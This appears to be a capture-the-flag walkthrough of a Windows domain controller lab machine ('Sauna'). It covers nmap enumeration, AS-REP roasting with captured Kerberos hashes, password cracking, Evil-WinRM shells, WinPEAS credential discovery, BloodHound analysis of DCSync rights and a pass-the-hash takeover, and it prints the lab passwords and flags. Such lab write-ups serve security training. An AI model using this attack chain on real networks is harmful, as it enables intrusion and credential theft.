As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Sat Apr 1 12:34:41 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.051s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49668/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49677/tcp open unknown
49689/tcp open unknown
49698/tcp open unknown
# Nmap done at Sat Apr 1 12:35:21 2023 -- 1 IP address (1 host up) scanned in 39.58 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Sat Apr 1 12:36:27 2023 as: nmap -sCV -p53,80,88,135,139,445,464,593,636,3268,3269,5985,9389,49668,49673,49674,49677,49689,49698 -Pn -n -oN targeted 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-01 17:36:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m01s
| smb2-time:
| date: 2023-04-01T17:37:28
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 1 12:38:03 2023 -- 1 IP address (1 host up) scanned in 95.96 seconds
Let's start by enumerating the SMB service. As we can see the domain is EGOTISTICAL-BANK.LOCAL.
Now that we know some valid users, put them into the users file, and let's try to perform an ASREPRoast attack.
ASREPRoast attack: when a user does not need pre-authentication, it is possible to obtain a TGT, without knowing the user's credentials, which contains data encrypted with the user's hash, which can be used for offline cracking.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User administrator@EGOTISTICAL-BANK.LOCAL doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hsmith@EGOTISTICAL-BANK.LOCAL doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator@EGOTISTICAL-BANK.LOCAL doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL:34fde6ec753968064ea0fd141da0995d$c6a395188b9d5bc69ae7bcf8d9d395c38ce2d7706439e8b273d117a202c5a738d39e27fc426a4cffd50fac60e5f500ef67067af33bc5425f57021da1ff80fd56460ae125d3ebc5b3d43e7c49f16f5252373e3a6646938460bb2b5522fc6be544e649857d1a6f57cf75cc84b7d637b497dd3856a0ab9b248c7f34a375264d997afa82cc1fe94970da4d189c3dd4b18e4e4f9b8b865768889c6c10133d01d3344f93577b33033a2d86774c5f6357d33c326fbe83cd65f93078aeac0ccfb58581c459f16a9c0abe578fd164ff31d70c9a6404ae521db04a43146de874516b9d76462ac03c9c3aa9368d32170bd803b0dc21f30dd0e8fb43e1bdab9ce0da54cb41e7
$krb5asrep$23$Fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL:0d955097f63d940fcdd84389bb289a27$8c2f6a716e24da9a3fe893d579efaed9752a1453e7e8a13d6dadaa66a777612338cfacc659b0a5f493f84e435e64e0d837d5969bc9bce1419af0ef353233ae4e3e735ecc909035e4e3aa92b7c7df587cd1408d4fe9a5f551b5073d9ffd0726687b4beb3d4c2f7e40d065535a2271c6ce222d2d3f636d37785cd962789b2f500acb89e71f55288e588033272b56700411286a1c25b2f7112108da85aca7c636bb119f37a594276c73dd3747fd4502cc80608f9cef6dbe6aa4770e7bd66e39692281fc3eca6af908bb4859de0a03a79fd46bca7661b3241ecaa521a12121dc6a487eb86ff2d0ef01fc0664f59f945f5c0740fc29f9bea6e205524f75bb17f091e8
We get the hash of the fsmith user. Let's break it with john.
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:07 DONE (2023-04-02 12:21) 0.1251g/s 1319Kp/s 1319Kc/s 1319KC/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now we have valid credentials for the fsmith user.
As seen above, the fsmith user seems to be a member of the Remote Management Users group, because it is possible to get a shell as him via WinRM. Then, we'll be able to grab the user flag.
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> type \users\fsmith\desktop\user.txt
99bb03df1359aa92126e0ac4bb06e325
Privilege Escalation
If you try to enumerate the system manually, you will not find much. Let's run WinPEAS and see what it tells us.
WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. You can download it from the official Github page:
Upload the binary to the system, and execute it.
upload /home/alfa8sa/tools/privEsc/winPEASany.exe
.\winPEASany.exe
...
ÃÃÃÃÃÃÃÃÃÃÚ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
...
It found credentials for the svc_loanmanager user. That user does not exist, but there is a username with a similar username called svc_loanmgr.
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
Now we need to find a way to escalate privileges to NT AUTHORITY\SYSTEM. As we are facing a domain controller, it would be helpful to run BloodHound with the bloodhound-python tool.
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 08S
Now, we have to start BloodHound. First, we have to start neo4j.
neo4j console
Then we will search for the localhost on port 4747 and log in with the username neo4j and password neo4j. Youâll have to change the password.
On a new console, run BloodHound.
bloodhound -nosandbox
Then log in with the credentials you set up earlier.
Then, click on the Upload Data button on the right section and select all the .json files.
Once all the .json files are uploaded go to the Analysis section. There we'll see that the user svc_loanmgr user has DCSync rights.
As we have his credentials, we can dump hashes of every local user remotely with secrets-dump.
Now that we have the NTLM hash of the administrator, we can get a shell using Pass The Hash. Then, all we have to do is reap the harvest and take the root flag.
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
6eaf06be24b9c3df464cdd242bf7ebb4
